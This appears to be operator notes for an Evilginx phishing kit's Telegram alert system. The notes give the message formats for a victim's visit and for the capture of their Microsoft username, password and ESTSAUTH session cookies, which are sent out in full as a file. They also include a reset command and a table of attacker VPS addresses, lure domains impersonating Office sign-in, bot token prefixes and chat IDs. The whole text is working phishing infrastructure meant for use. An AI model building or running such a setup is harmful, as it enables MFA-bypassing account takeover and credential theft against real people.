Notification Format
Three messages per capture — VISITOR text + CAPTURE text + cookies JSON file
Message 1 — VISITOR
Fires the moment anyone lands on the lure. Before they type anything.
VISITOR — office-auth.com
Session #3
IP: 197.210.54.101
Location: Lagos, Nigeria | MTN Nigeria
Device: iPhone iOS 18.5 / Safari
Lure: https://login.office-auth.com/jDabnEAR
Time: 2026-06-02 14:23 WATMessage 2 — CAPTURE
CAPTURE — office-auth.com
Session #3
User: victim@company.com
Pass: Passw0rd!
IP: 197.210.54.101
Location: Lagos, Nigeria | MTN Nigeria
Device: Windows 10/11 / Chrome 124
Cookies: 3 captured
ESTSAUTH keys: ESTSAUTH, ESTSAUTHPERSISTENT
Time: 2026-06-02 14:24 WATMessage 3 — File
session_N_cookies.json sent as Telegram document upload. Full cookie values, no truncation. ESTSAUTHPERSISTENT alone is 800+ chars. Telegram text cap is 4096. File has no limit.
Seen File Logic
v{sid} # fires once on new session (VISITOR)
c{sid} # fires when username or tokens appear (CAPTURE)
rm /root/.evilginx_notify_seen && pm2 restart evilginx-notify # reset for testingPer-VPS Reference
| VPS | Domain | Bot token prefix | Chat ID |
|---|---|---|---|
| 62.171.153.214 | ms.appsession.org | 8622630606 | 6301139964 |
| 80.78.18.72 | office-auth.com | 8419178095 | 7100847959 |